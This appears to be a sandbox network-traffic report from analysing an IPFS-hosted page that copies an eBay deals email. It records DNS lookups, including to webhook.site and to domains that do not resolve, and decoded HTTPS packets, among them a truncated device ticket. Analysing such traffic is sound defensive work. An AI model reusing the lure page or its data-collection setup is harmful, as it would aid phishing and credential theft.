Jan 14, 2025 01:48:01.387720108 CET	192.168.2.6	1.1.1.1	0x70fd	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:48:01.387995005 CET	192.168.2.6	1.1.1.1	0xf70d	Standard query (0)	www.google.com	65	IN (0x0001)	false
Jan 14, 2025 01:48:02.995712996 CET	192.168.2.6	1.1.1.1	0x19b7	Standard query (0)	ipfs.io	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:48:02.996062994 CET	192.168.2.6	1.1.1.1	0xa16e	Standard query (0)	ipfs.io	65	IN (0x0001)	false
Jan 14, 2025 01:48:06.531626940 CET	192.168.2.6	1.1.1.1	0xf300	Standard query (0)	alphatrade-options.com	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:48:06.531766891 CET	192.168.2.6	1.1.1.1	0x5156	Standard query (0)	alphatrade-options.com	65	IN (0x0001)	false
Jan 14, 2025 01:48:06.564726114 CET	192.168.2.6	1.1.1.1	0xebdf	Standard query (0)	alphatrade-options.com	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:48:17.816916943 CET	192.168.2.6	1.1.1.1	0xb4d6	Standard query (0)	webhook.site	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:48:17.817187071 CET	192.168.2.6	1.1.1.1	0xe38c	Standard query (0)	webhook.site	65	IN (0x0001)	false
Jan 14, 2025 01:48:53.875329018 CET	192.168.2.6	1.1.1.1	0x39b4	Standard query (0)	www.xsjcjre.com	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:48:53.875540018 CET	192.168.2.6	1.1.1.1	0xd6d4	Standard query (0)	www.xsjcjre.com	65	IN (0x0001)	false
Jan 14, 2025 01:48:53.916222095 CET	192.168.2.6	1.1.1.1	0xafa7	Standard query (0)	www.xsjcjre.com	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:48:53.976732969 CET	192.168.2.6	8.8.8.8	0x7dea	Standard query (0)	google.com	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:48:53.977421045 CET	192.168.2.6	1.1.1.1	0x3e63	Standard query (0)	google.com	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:48:55.056818008 CET	192.168.2.6	1.1.1.1	0x9292	Standard query (0)	www.xsjcjre.com	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:48:55.056874990 CET	192.168.2.6	1.1.1.1	0x2bb0	Standard query (0)	www.xsjcjre.com	65	IN (0x0001)	false
Jan 14, 2025 01:49:00.098555088 CET	192.168.2.6	1.1.1.1	0x1ce0	Standard query (0)	www.xsjcjre.com	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:49:00.098705053 CET	192.168.2.6	1.1.1.1	0x881d	Standard query (0)	www.xsjcjre.com	65	IN (0x0001)	false
Jan 14, 2025 01:49:00.108903885 CET	192.168.2.6	1.1.1.1	0x3355	Standard query (0)	www.xsjcjre.com	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:49:04.953588963 CET	192.168.2.6	1.1.1.1	0x82db	Standard query (0)	www.xsjcjre.com	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:49:04.953723907 CET	192.168.2.6	1.1.1.1	0xeaa8	Standard query (0)	www.xsjcjre.com	65	IN (0x0001)	false
Jan 14, 2025 01:49:04.967361927 CET	192.168.2.6	1.1.1.1	0xe451	Standard query (0)	www.xsjcjre.com	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:49:04.987778902 CET	192.168.2.6	1.1.1.1	0x73b3	Standard query (0)	google.com	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:49:04.988279104 CET	192.168.2.6	8.8.8.8	0x8c3f	Standard query (0)	google.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 14, 2025 01:48:01.394747019 CET	1.1.1.1	192.168.2.6	0xf70d	No error (0)	www.google.com			65	IN (0x0001)	false
Jan 14, 2025 01:48:01.394951105 CET	1.1.1.1	192.168.2.6	0x70fd	No error (0)	www.google.com		216.58.206.36	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:48:03.002499104 CET	1.1.1.1	192.168.2.6	0x19b7	No error (0)	ipfs.io		209.94.90.1	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:48:03.002888918 CET	1.1.1.1	192.168.2.6	0xa16e	No error (0)	ipfs.io			65	IN (0x0001)	false
Jan 14, 2025 01:48:06.563375950 CET	1.1.1.1	192.168.2.6	0x5156	Name error (3)	alphatrade-options.com	none	none	65	IN (0x0001)	false
Jan 14, 2025 01:48:06.564047098 CET	1.1.1.1	192.168.2.6	0xf300	Name error (3)	alphatrade-options.com	none	none	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:48:06.574182987 CET	1.1.1.1	192.168.2.6	0xebdf	Name error (3)	alphatrade-options.com	none	none	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:48:17.823972940 CET	1.1.1.1	192.168.2.6	0xb4d6	No error (0)	webhook.site		178.63.67.153	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:48:17.823972940 CET	1.1.1.1	192.168.2.6	0xb4d6	No error (0)	webhook.site		178.63.67.106	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:48:53.884803057 CET	1.1.1.1	192.168.2.6	0xd6d4	Name error (3)	www.xsjcjre.com	none	none	65	IN (0x0001)	false
Jan 14, 2025 01:48:53.915518045 CET	1.1.1.1	192.168.2.6	0x39b4	Name error (3)	www.xsjcjre.com	none	none	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:48:53.925489902 CET	1.1.1.1	192.168.2.6	0xafa7	Name error (3)	www.xsjcjre.com	none	none	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:48:53.984163046 CET	1.1.1.1	192.168.2.6	0x3e63	No error (0)	google.com		216.58.212.142	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:48:53.991873026 CET	8.8.8.8	192.168.2.6	0x7dea	No error (0)	google.com		172.217.169.110	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:48:55.065527916 CET	1.1.1.1	192.168.2.6	0x9292	Name error (3)	www.xsjcjre.com	none	none	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:48:55.212682962 CET	1.1.1.1	192.168.2.6	0x2bb0	Name error (3)	www.xsjcjre.com	none	none	65	IN (0x0001)	false
Jan 14, 2025 01:49:00.108118057 CET	1.1.1.1	192.168.2.6	0x881d	Name error (3)	www.xsjcjre.com	none	none	65	IN (0x0001)	false
Jan 14, 2025 01:49:00.108302116 CET	1.1.1.1	192.168.2.6	0x1ce0	Name error (3)	www.xsjcjre.com	none	none	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:49:00.118330956 CET	1.1.1.1	192.168.2.6	0x3355	Name error (3)	www.xsjcjre.com	none	none	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:49:04.962074995 CET	1.1.1.1	192.168.2.6	0x82db	Name error (3)	www.xsjcjre.com	none	none	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:49:04.962651014 CET	1.1.1.1	192.168.2.6	0xeaa8	Name error (3)	www.xsjcjre.com	none	none	65	IN (0x0001)	false
Jan 14, 2025 01:49:04.974354029 CET	1.1.1.1	192.168.2.6	0xe451	Name error (3)	www.xsjcjre.com	none	none	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:49:04.994517088 CET	1.1.1.1	192.168.2.6	0x73b3	No error (0)	google.com		142.250.185.78	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:49:04.995873928 CET	8.8.8.8	192.168.2.6	0x8c3f	No error (0)	google.com		172.217.169.110	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ipfs.io

https:

webhook.site

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.6	49708	40.113.103.199	443

Timestamp	Bytes transferred	Direction	Data
2025-01-14 00:47:58 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 46 65 46 59 51 4b 45 6f 7a 55 53 58 54 62 35 67 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 64 61 65 66 32 62 63 62 36 30 36 62 31 39 37 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: FeFYQKEozUSXTb5g.1Context: fdaef2bcb606b197
2025-01-14 00:47:58 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-14 00:47:58 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 46 65 46 59 51 4b 45 6f 7a 55 53 58 54 62 35 67 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 64 61 65 66 32 62 63 62 36 30 36 62 31 39 37 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 6a 6b 4c 74 76 5a 38 41 57 79 77 55 73 48 66 76 62 45 73 78 7a 6b 54 49 31 65 7a 45 4f 34 48 51 59 61 4a 46 79 7a 77 44 4f 6c 55 55 4f 5a 77 66 42 75 74 71 39 47 48 31 34 7a 6f 32 66 31 65 73 6e 4a 45 70 4c 59 4e 48 33 51 70 49 67 67 36 31 43 37 50 43 6a 50 6d 39 42 76 46 71 76 6e 6d 37 44 30 51 4e 33 6f 37 54 33 48 36 6f Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: FeFYQKEozUSXTb5g.2Context: fdaef2bcb606b197<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAejkLtvZ8AWywUsHfvbEsxzkTI1ezEO4HQYaJFyzwDOlUUOZwfButq9GH14zo2f1esnJEpLYNH3QpIgg61C7PCjPm9BvFqvnm7D0QN3o7T3H6o
2025-01-14 00:47:58 UTC	74	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 46 65 46 59 51 4b 45 6f 7a 55 53 58 54 62 35 67 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 64 61 65 66 32 62 63 62 36 30 36 62 31 39 37 0d 0a 0d 0a Data Ascii: BND 3 CON\QOS 56MS-CV: FeFYQKEozUSXTb5g.3Context: fdaef2bcb606b197
2025-01-14 00:47:58 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2025-01-14 00:47:58 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 63 58 78 74 75 46 2b 6a 39 30 71 6d 48 64 59 36 79 4c 4b 47 78 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: cXxtuF+j90qmHdY6yLKGxQ.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.6	49716	40.113.103.199	443

Timestamp	Bytes transferred	Direction	Data
2025-01-14 00:47:59 UTC	70	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 34 0d 0a 4d 53 2d 43 56 3a 20 50 37 63 39 41 6c 44 6d 4c 55 61 6b 71 49 38 71 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 35 31 39 65 37 62 32 37 35 31 61 34 36 61 0d 0a 0d 0a Data Ascii: CNT 1 CON 304MS-CV: P7c9AlDmLUakqI8q.1Context: 4519e7b2751a46a
2025-01-14 00:47:59 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-14 00:47:59 UTC	1083	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 30 0d 0a 4d 53 2d 43 56 3a 20 50 37 63 39 41 6c 44 6d 4c 55 61 6b 71 49 38 71 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 35 31 39 65 37 62 32 37 35 31 61 34 36 61 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 6a 6b 4c 74 76 5a 38 41 57 79 77 55 73 48 66 76 62 45 73 78 7a 6b 54 49 31 65 7a 45 4f 34 48 51 59 61 4a 46 79 7a 77 44 4f 6c 55 55 4f 5a 77 66 42 75 74 71 39 47 48 31 34 7a 6f 32 66 31 65 73 6e 4a 45 70 4c 59 4e 48 33 51 70 49 67 67 36 31 43 37 50 43 6a 50 6d 39 42 76 46 71 76 6e 6d 37 44 30 51 4e 33 6f 37 54 33 48 36 6f 47 Data Ascii: ATH 2 CON\DEVICE 1060MS-CV: P7c9AlDmLUakqI8q.2Context: 4519e7b2751a46a<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAejkLtvZ8AWywUsHfvbEsxzkTI1ezEO4HQYaJFyzwDOlUUOZwfButq9GH14zo2f1esnJEpLYNH3QpIgg61C7PCjPm9BvFqvnm7D0QN3o7T3H6oG
2025-01-14 00:47:59 UTC	217	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 36 0d 0a 4d 53 2d 43 56 3a 20 50 37 63 39 41 6c 44 6d 4c 55 61 6b 71 49 38 71 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 35 31 39 65 37 62 32 37 35 31 61 34 36 61 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 196MS-CV: P7c9AlDmLUakqI8q.3Context: 4519e7b2751a46a<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2025-01-14 00:47:59 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2025-01-14 00:47:59 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 32 62 44 46 36 70 34 34 32 6b 69 79 56 58 45 6b 6c 6c 46 66 77 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: 2bDF6p442kiyVXEkllFfwQ.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49726	209.94.90.1	443	5264	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 00:48:03 UTC	714	OUT	GET /ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q HTTP/1.1 Host: ipfs.io Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-14 00:48:03 UTC	1069	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 00:48:03 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close access-control-allow-headers: Content-Type access-control-allow-headers: Range access-control-allow-headers: User-Agent access-control-allow-headers: X-Requested-With access-control-allow-methods: GET access-control-allow-methods: HEAD access-control-allow-methods: OPTIONS access-control-allow-origin: * access-control-expose-headers: Content-Length access-control-expose-headers: Content-Range access-control-expose-headers: X-Chunked-Output access-control-expose-headers: X-Ipfs-Path access-control-expose-headers: X-Ipfs-Roots access-control-expose-headers: X-Stream-Output Cache-Control: public, max-age=29030400, immutable x-ipfs-path: /ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q x-ipfs-roots: bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q x-ipfs-pop: rainbow-ny5-04 CF-Cache-Status: HIT Age: 26027 Server: cloudflare CF-RAY: 90199e463c678c3f-EWR alt-svc: h3=":443"; ma=86400
2025-01-14 00:48:03 UTC	300	IN	Data Raw: 37 62 38 34 0d 0a ef bb bf 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 21 2d 2d 6c 4a 66 77 38 37 65 72 e6 95 ac e7 9a 84 e5 90 84 e8 a1 8c e6 a5 ad e4 be 9b e6 87 89 e5 95 86 2c 53 68 6f 70 20 69 6e 20 62 6f 0d 0a 48 69 20 59 69 6e 0d 0a 45 2d 6d 61 69 6c 0d 0a 0d 0a 0d 0a 45 78 70 6c 6f 72 65 20 79 6f 75 72 20 77 65 65 6b 6c 79 20 73 61 76 69 6e 67 73 0d 0a 57 61 72 6d 20 75 70 20 77 69 74 68 20 67 72 65 61 74 20 64 65 61 6c 73 20 6f 6e 20 79 6f 75 72 20 66 61 76 65 73 2e 0d Data Ascii: 7b84<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head>...lJfw87er,Shop in boHi YinE-mailExplore your weekly savingsWarm up with great deals on your faves.
2025-01-14 00:48:03 UTC	1369	IN	Data Raw: 65 65 20 61 6c 6c 0d 0a 49 6d 61 67 65 20 6f 66 20 44 79 73 6f 6e 20 56 31 31 e2 84 a2 20 41 64 76 61 6e 63 65 64 20 53 74 69 63 6b 2e 2e 2e 0d 0a 44 79 73 6f 6e 20 56 31 31 e2 84 a2 20 41 64 76 61 6e 63 65 64 20 53 74 69 63 6b 2e 2e 2e 0d 0a 41 55 20 24 37 38 38 2e 30 30 0d 0a 0d 0a 41 55 20 24 31 2c 31 39 39 2e 30 30 20 c2 b7 20 41 55 20 24 34 31 31 2e 30 30 20 4f 46 46 0d 0a 0d 0a 44 69 72 65 63 74 20 66 72 6f 6d 20 44 79 73 6f 6e 20 44 69 72 65 63 74 20 66 72 6f 6d 20 44 79 73 6f 6e 0d 0a 0d 0a 49 6d 61 67 65 20 6f 66 20 41 5a 44 4f 4d 45 20 34 4b 20 44 61 73 68 20 43 61 6d 20 55 48 44 2e 2e 2e 0d 0a 41 5a 44 4f 4d 45 20 34 4b 20 44 61 73 68 20 43 61 6d 20 55 48 44 2e 2e 2e 0d 0a 41 55 20 24 35 35 2e 39 39 0d 0a 0d 0a 41 55 20 24 37 31 2e 39 39 20 c2 Data Ascii: ee allImage of Dyson V11 Advanced Stick...Dyson V11 Advanced Stick...AU $788.00AU $1,199.00 AU $411.00 OFFDirect from Dyson Direct from DysonImage of AZDOME 4K Dash Cam UHD...AZDOME 4K Dash Cam UHD...AU $55.99AU $71.99
2025-01-14 00:48:03 UTC	1369	IN	Data Raw: 20 4f 70 65 6e 2d 62 61 63 6b 2e 2e 2e 0d 0a 41 55 20 24 31 39 39 2e 30 30 0d 0a 0d 0a 41 55 20 24 33 39 39 2e 39 35 20 c2 b7 20 41 55 20 24 32 30 30 2e 39 35 20 4f 46 46 0d 0a 0d 0a 44 69 72 65 63 74 20 66 72 6f 6d 20 53 65 6e 6e 68 65 69 73 65 72 20 44 69 72 65 63 74 20 66 72 6f 6d 20 53 65 6e 6e 68 65 69 73 65 72 0d 0a 0d 0a 45 78 70 6c 6f 72 65 20 67 72 65 61 74 20 6f 66 66 65 72 73 20 66 72 6f 6d 20 74 6f 70 20 62 72 61 6e 64 73 0d 0a 48 6f 74 20 73 61 76 69 6e 67 73 20 61 63 72 6f 73 73 20 61 20 68 75 67 65 20 72 61 6e 67 65 20 6f 6e 20 70 72 6f 64 75 63 74 73 20 79 6f 75 20 6c 6f 76 65 2e 0d 0a 0d 0a 53 68 6f 70 20 6e 6f 77 20 0d 0a 53 61 6c 65 73 20 26 20 65 76 65 6e 74 73 0d 0a 65 42 61 79 20 4c 6f 67 6f 09 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: Open-back...AU $199.00AU $399.95 AU $200.95 OFFDirect from Sennheiser Direct from SennheiserExplore great offers from top brandsHot savings across a huge range on products you love.Shop now Sales & eventseBay Logo
2025-01-14 00:48:03 UTC	1369	IN	Data Raw: 20 41 55 20 24 34 33 39 2e 38 30 20 4f 46 46 0d 0a 0d 0a 49 6d 61 67 65 20 6f 66 20 41 4c 46 4f 52 44 53 4f 4e 20 41 64 69 72 6f 6e 64 61 63 6b 20 43 68 61 69 72 2e 2e 2e 0d 0a 41 4c 46 4f 52 44 53 4f 4e 20 41 64 69 72 6f 6e 64 61 63 6b 20 43 68 61 69 72 2e 2e 2e 0d 0a 41 55 20 24 31 31 39 2e 39 35 0d 0a 0d 0a 41 55 20 24 39 35 39 2e 39 35 20 c2 b7 20 41 55 20 24 38 34 30 2e 30 30 20 4f 46 46 0d 0a 0d 0a 49 6d 61 67 65 20 6f 66 20 4f 69 6b 69 74 75 72 65 20 4b 69 74 63 68 65 6e 20 49 73 6c 61 6e 64 2e 2e 2e 0d 0a 4f 69 6b 69 74 75 72 65 20 4b 69 74 63 68 65 6e 20 49 73 6c 61 6e 64 2e 2e 2e 0d 0a 41 55 20 24 31 37 30 2e 30 30 0d 0a 0d 0a 49 6d 61 67 65 20 6f 66 20 42 65 64 72 61 20 45 6c 65 63 74 72 69 63 20 42 6c 61 6e 6b 65 74 20 46 75 6c 6c 79 2e 2e 2e Data Ascii: AU $439.80 OFFImage of ALFORDSON Adirondack Chair...ALFORDSON Adirondack Chair...AU $119.95AU $959.95 AU $840.00 OFFImage of Oikiture Kitchen Island...Oikiture Kitchen Island...AU $170.00Image of Bedra Electric Blanket Fully...
2025-01-14 00:48:03 UTC	1369	IN	Data Raw: 31 2c 31 39 39 2e 30 30 20 c2 b7 20 41 55 20 24 34 31 31 2e 30 30 20 4f 46 46 0d 0a 0d 0a 44 69 72 65 63 74 20 66 72 6f 6d 20 44 79 73 6f 6e 20 44 69 72 65 63 74 20 66 72 6f 6d 20 44 79 73 6f 6e 0d 0a 0d 0a 49 6d 61 67 65 20 6f 66 20 41 5a 44 4f 4d 45 20 34 4b 20 44 61 73 68 20 43 61 6d 20 55 48 44 2e 2e 2e 0d 0a 41 5a 44 4f 4d 45 20 34 4b 20 44 61 73 68 20 43 61 6d 20 55 48 44 2e 2e 2e 0d 0a 41 55 20 24 35 35 2e 39 39 0d 0a 0d 0a 41 55 20 24 37 31 2e 39 39 20 c2 b7 20 32 32 25 20 4f 46 46 0d 0a 0d 0a 49 6d 61 67 65 20 6f 66 20 50 65 72 66 65 63 74 20 43 68 6f 69 63 65 20 52 65 64 20 4d 69 78 65 64 20 57 69 6e 65 73 2e 2e 2e 0d 0a 50 65 72 66 65 63 74 20 43 68 6f 69 63 65 20 52 65 64 20 4d 69 78 65 64 20 57 69 6e 65 73 2e 2e 2e 0d 0a 41 55 20 24 36 35 2e Data Ascii: 1,199.00 AU $411.00 OFFDirect from Dyson Direct from DysonImage of AZDOME 4K Dash Cam UHD...AZDOME 4K Dash Cam UHD...AU $55.99AU $71.99 22% OFFImage of Perfect Choice Red Mixed Wines...Perfect Choice Red Mixed Wines...AU $65.
2025-01-14 00:48:03 UTC	1369	IN	Data Raw: 6e 68 65 69 73 65 72 0d 0a 0d 0a 45 78 70 6c 6f 72 65 20 67 72 65 61 74 20 6f 66 66 65 72 73 20 66 72 6f 6d 20 74 6f 70 20 62 72 61 6e 64 73 0d 0a 48 6f 74 20 73 61 76 69 6e 67 73 20 61 63 72 6f 73 73 20 61 20 68 75 67 65 20 72 61 6e 67 65 20 6f 6e 20 70 72 6f 64 75 63 74 73 20 79 6f 75 20 6c 6f 76 65 2e 0d 0a 0d 0a 53 68 6f 70 20 6e 6f 77 20 0d 0a 53 61 6c 65 73 20 26 20 65 76 65 6e 74 73 0d 0a 65 42 61 79 20 4c 6f 67 6f 09 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 0d 0a 55 70 64 61 74 65 20 79 6f 75 72 20 65 6d 61 69 6c 20 70 72 65 66 65 72 65 6e 63 65 73 2c 20 75 6e 73 75 62 73 63 72 69 62 65 20 6f 72 20 6c 65 61 72 6e 20 61 62 6f 75 74 20 61 63 63 6f 75 6e 74 20 70 72 6f 74 65 63 74 69 6f 6e 2e 0d 0a 49 66 20 79 6f 75 Data Ascii: nheiserExplore great offers from top brandsHot savings across a huge range on products you love.Shop now Sales & eventseBay Logo Update your email preferences, unsubscribe or learn about account protection.If you
